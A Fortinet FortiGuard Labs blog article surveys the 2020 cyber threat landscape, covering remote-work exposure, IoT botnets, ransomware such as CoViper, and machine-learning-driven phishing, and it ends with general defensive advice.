From botnets to phishing: A discussion on the 2020 threat landscape


Share

By Aamir Lakhani, Global Security Strategist and Lead Researcher for FortiGuard Labs.

An unforeseeable shift in network structures and attack strategies was dropped on the cybersecurity industry in 2020. As the COVID-19 pandemic continues to take its toll on organizations and individuals around the globe, we are now dealing with a threat landscape that’s become more intense, complex, and saturated than ever before. And many organizations are finding it challenging to allot sufficient resources towards managing and mitigating these growing and evolving threats, having already faced operational setbacks prompted by the sudden transition to a fully remote workplace.  

Considering the ever-evolving nature of today’s cyber threats, business leaders must continually familiarize themselves with up-to-date threat intelligence and invest in the resources necessary to protect what is now – and will remain indefinitely – a larger, more fluid attack surface. This time, the changes happening across the cyber threat landscape are more dramatic, and the risks due to recent network changes are greater than ever. This makes accurate and actionable threat intelligence even more crucial. The following threat summary highlights the cyber criminal community’s ability to adapt and take advantage of low-hanging fruit to achieve their goals.

Leveraging At-Home Technology as a Gateway to the Enterprise

In the past, security teams were primarily focused on protecting users from application and networking threats, and hardening connected resources safely tucked inside the network perimeter. But this is no longer the case. During the pandemic, there has been an exponential rise in IoT usage and a reliance on home networks and consumer grade devices, such as home routers and modems – something which cyber criminals were quick to take notice of. The surge in remote work has also focused considerable attention on the security of personal devices being used to connect to the corporate network, including smartphones, tablets, laptops, and PCs. For attackers, this shift has presented a unique opportunity to exploit these devices and gain a foothold in enterprise networks (or, at least, on the devices used to access those networks). Such devices are easily compromised, and researchers are seeing the formation of large botnets that can be used to launch DDoS attacks or distribute malware aimed at the enterprise.

Over time, cyber criminals have not only grown to understand technology better but also have access to more sophisticated resources than they had in the past, making the task of protecting distributed resources more challenging than ever. Through the use of AI and machine learning tools, for example, cybercriminals are taking full advantage of the expanding attack surface and successfully bypassing traditional safeguards. Because of these advances in attack methods and technologies, IT teams are now struggling to stay ahead of things like updated ransomware and phishing threats that are being leveraged to compromise at-home IoT devices.

Ransomware Attacks Becoming More Sophisticated

Ransomware attacks have always been a significant concern for businesses. But over the past several months they’ve become more prevalent and costlier – both in terms of downtime and damages. Why has this threat not only persisted for so long, but recently become even more challenging? Because ransomware is even more readily available to attackers via DarkNet marketplaces. New ransomware technologies, including ransomware-as-a-service is inexpensive and is relatively simple to deploy. 

Ransomware has been discovered hidden in messages, attachments, and documents related to COVID-19. And these threats continue to grow more sophisticated, helping cybercriminals to stay ahead of the curve. Three specific ransomware samples fell into this category: NetWalker, Ransomware-GVZ, and CoViper. Of the three, CoViper was especially concerning, having been found to rewrite the computer’s master boot record (MBR) before encrypting data. While our team has observed several attacks in the past where adversaries have used MBR wipers combined with ransomware to effectively cripple targeted PCs, this is an unusually aggressive strategy. 

Toward the end of the first half of the year, there were also several reports of potentially state-backed threat groups attacking organizations involved in COVID-19-related research in the U.S. and other countries. In addition, attackers have taken to moving critical data to public servers and threatening to release it publicly unless ransom demands are met – a way to circumvent the decision of victims to recover their systems themselves rather than give in to demands.

As these threats evolve, security teams must ensure they have access to real-time threat intelligence in order to stay up-to-date with the latest attack trends and methods. This includes keeping abreast of the tools being used by cyber criminals as a means of maximizing the impact of their attacks, including social media and Darknet search engines. And it also means modifying current strategies. Organizations are now advised to keep all data encrypted, whether in motion or at rest, to thwart recent attack strategies.

Phishing Evolves via Machine Learning

Many of the phishing attacks of the past have been unsophisticated and easily prevented, only posing a serious risk to the gullible. These scams generally employ social engineering tactics to steal credentials from unsuspecting users, often via email. In other cases, a compelling message is used to convince a victim to follow a link that installs malware or exposes sensitive data. 

But increasingly, these attacks are being used to set the stage for both on-premises and cloud service attacks. Recent phishing tactics are far more sophisticated and have evolved to target the weak links found at the edges of business networks. While employees at most organizations are now better educated about the dangers of email phishing, and take greater precautions when encountering a suspicious-looking link, hackers have begun to alter their approach. For example, cyber criminals are targeting unsecured home networks and novice teleworkers who lack essential cybersecurity training to steal personal information and launch attacks against the business networks to which they are connected. 

Many are also using machine learning to rapidly craft, test, and distribute messages with increasingly realistic visual content that triggers emotional distress in recipients. They can actually analyze different versions of attacks and modify their methods to ensure maximum effectiveness. Emerging phishing attacks include scams claiming to help targets deposit their stimulus checks, provide access to hard to find medical supplies or personal protective equipment, or offer helpdesk support for remote workers

The majority of these phishing attacks contain malicious payloads – including ransomware, viruses, and remote access trojans (RATs) designed to provide criminals with remote access to endpoint systems, enabling them to perform remote desktop protocol (RDP) exploits. 

Our team also documented a significant spike in web-based phishing, beginning with the HTML/Phishing cyber threat family back in January and February of 2020 and that held true through the end of May. Similar HTML cousins – /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) – have also contributed to the increase in phishing attempts this year. Web-based malware tends to override or bypass most common antivirus programs, giving it a greater chance of survival and successful infection. 

Security professionals should take note: The browser has been a key delivery vector for malware thus far in 2020, and this trend will likely continue into the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the transition to a remote workforce strategy. This shift reinforces the point that cyber criminals have intentionally changed their attack methodologies by targeting the traffic that is now flooding lesser-secured networks. For this reason, organizations must not only provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network, but also provide additional resources, such as new endpoint detection and response (EDR) solutions that can detect and stop advanced threats.

Looking Ahead of the Threat Landscape

The COVID-19 pandemic has reinforced what many industry professionals have recognized and championed for quite some time: That effective cybersecurity requires constant vigilance and the ability to adapt to changing threat strategies. While security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, and more adaptable solutions – especially as cyber criminals modify their attack methods to leverage personal devices as a springboard to enterprise networks. With this in mind, shoring up remote systems and networks should make the top of the to-do list. 

Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity. A vital component of this is continuous access to up-to-date threat intelligence and cybersecurity training. Fortinet is committed to addressing this need by providing leading-edge insights into the cybersecurity threat landscape through our FortiGuard Labs global threat research team, advanced threat detection technologies, and, in-depth reporting on advancing threat trends.


Leave a reply